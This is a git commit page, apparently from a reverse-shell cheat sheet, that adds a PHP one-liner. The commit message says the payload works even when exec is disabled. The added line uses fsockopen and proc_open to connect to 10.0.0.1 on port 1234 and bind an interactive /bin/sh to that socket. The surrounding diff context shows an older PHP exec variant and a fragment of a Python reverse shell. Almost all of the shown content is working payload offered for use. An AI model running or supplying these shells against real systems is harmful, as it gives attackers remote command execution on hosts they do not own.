Added PHP reverse shell

This reverse shell payload for PHP works even if `exec` is disabled and/or the new socket is not on fd 3
This commit is contained in:
György Demarcsek 2020-01-02 19:27:35 +01:00 committed by GitHub
parent 0850839b25
commit 9c188139ec
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -107,6 +107,10 @@ C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('1
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
``` ```
```bash
php -r '$sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
```
### Ruby ### Ruby
```ruby ```ruby